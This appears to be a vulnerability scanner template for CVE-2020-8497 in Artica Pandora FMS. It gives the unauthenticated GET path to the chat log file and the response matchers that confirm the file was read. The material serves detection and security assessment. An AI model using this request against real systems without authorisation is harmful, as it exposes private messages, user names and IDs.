id: CVE-2020-8497 info: name: Artica Pandora FMS - Arbitrary File Read author: gy741 severity: medium description: In Artica Pandora FMS through 7.42, an unauthenticated attacker can read the chat history. The file is in JSON format and it contains user names, user IDs, private messages, and timestamps. reference: - https://k4m1ll0.com/cve-2020-8497.html - https://nvd.nist.gov/vuln/detail/CVE-2020-8497 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.30 cve-id: CVE-2020-8497 cwe-id: CWE-306 tags: cve,cve2020,fms,artica requests: - method: GET path: - '{{BaseURL}}/pandora_console/attachment/pandora_chat.log.json.txt' matchers-condition: and matchers: - type: word part: body words: - '"type"' - '"id_user"' - '"user_name"' - '"text"' condition: and - type: status status: - 200